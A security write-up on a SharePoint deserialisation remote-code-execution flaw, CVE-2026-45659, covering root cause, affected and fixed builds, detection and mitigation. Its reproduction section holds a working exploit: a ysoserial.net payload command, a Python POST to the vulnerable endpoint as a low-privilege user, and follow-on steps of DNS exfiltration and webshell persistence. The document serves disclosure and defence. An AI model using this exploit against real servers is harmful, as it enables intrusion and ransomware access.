SharePoint deserialisation RCE: CVE-2026-45659
A plain Site Member account is enough to run code on a SharePoint server. Microsoft rated exploitation unlikely, and CISA put it in the KEV catalogue with three days to remediate.
Overview
| Field | Detail |
|---|---|
| CVE | CVE-2026-45659 |
| CVSS | 8.8 (High) |
| CWE | CWE-502 deserialisation of untrusted data |
| Affected | SharePoint Server 2016, 2019, Subscription Edition |
| Fixed by | May 2026 security updates |
| Disclosed | 2026-05-21 |
| Exploited in the wild | Yes, CISA KEV and ransomware association |
SharePoint Server is one of the most widely deployed collaboration platforms on enterprise networks. The flaw lets an authenticated attacker holding only the lowest Site Member privilege (PR:L) run arbitrary code on the target server, with no administrator or elevated rights.
CISA added it to the Known Exploited Vulnerabilities catalogue on 1 July 2026 and gave federal agencies until 4 July to remediate, just three days. That tempo says two things at once: it is actively exploited, and it is tied to ransomware.
How it was found
The researchers audited handling logic in specific _layouts endpoints. _layouts/15/zoombldr.aspx and _layouts/15/people.aspx accept the __SPSCEdit field in a POST body and deserialise that field, without sufficient validation of where the data came from or what type it is.
That means a malicious serialised payload can be placed straight into __SPSCEdit. When the server processes the request, deserialisation invokes the object type and constructor the attacker named, ending in arbitrary code execution.
Microsoft published the advisory and patch on 21 May 2026, rating exploitation as less likely. CISA then added it to KEV on evidence of real exploitation. The gap between those two positions is itself the finding: a vendor’s initial assessment is not the final word.
Reproduction
Everything below is for authorised security testing only.
The lab needs Windows Server 2019 or 2022, SharePoint Server 2019 below build 16.0.10417.20128, a domain account with Site Member rights, and ysoserial.net.
Step one: build a .NET deserialisation payload. Use the TypeConfuseDelegate chain with BinaryFormatter and base64 output:
.\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter `
-c "cmd /c whoami" -o base64
Step two: send the exploit request. Place the payload in __SPSCEdit with the list and source fields and POST to the endpoint, authenticating as the Site Member:
data = {
"__SPSCEdit": payload_b64,
"__List": "Documents",
"__Source": f"{target}/Documents/Forms/AllItems.aspx",
}
session.post(f"{target}/_layouts/15/zoombldr.aspx", data=data, auth=(user, pwd))
A 200 means the request was accepted, 401 is a credential problem, and 403 means insufficient privilege. This flaw needs the lowest rung, Site Member.
Step three: verify and continue. With command output, read the response directly; without it, DNS exfiltration such as a hostname-bearing subdomain lookup confirms execution. Once code runs, the typical next move is writing a webshell into a web-accessible directory for persistence, with _layouts, _vti_bin and LAYOUTS/TEMPLATE as common landing spots.
Fix
Install the May 2026 SharePoint security updates. Fixed internal builds:
| Product | Fixed build |
|---|---|
| Subscription Edition | 16.0.19725.20280 |
| Server 2019 | 16.0.10417.20128 |
| Enterprise Server 2016 | 16.0.5552.1002 |
Detection focuses on SharePoint audit and IIS logs: anomalous POSTs to _layouts/15/zoombldr.aspx and _layouts/15/people.aspx, unusual use of the __SPSCEdit field, unexpected files under web-accessible directories such as .aspx webshells, and unusual child process creation.
Defence in depth follows least privilege: restrict Site Member assignments, narrow network access to the management endpoints and _layouts directory, enable detailed audit logging, and deploy EDR to watch for suspicious code execution.
Verdict
The severity here comes from the low privilege required. An ordinary Site Member account, the level most SharePoint environments hand to ordinary staff by default, is enough to execute arbitrary code on the server. One successful phish yielding an ordinary domain credential becomes a beachhead.
The gap between Microsoft’s less-likely rating and CISA adding it to KEV with a three-day deadline is the most portable lesson in this case: exploitation status in the wild needs continuous tracking, not a conclusion drawn on announcement day.

Comments
…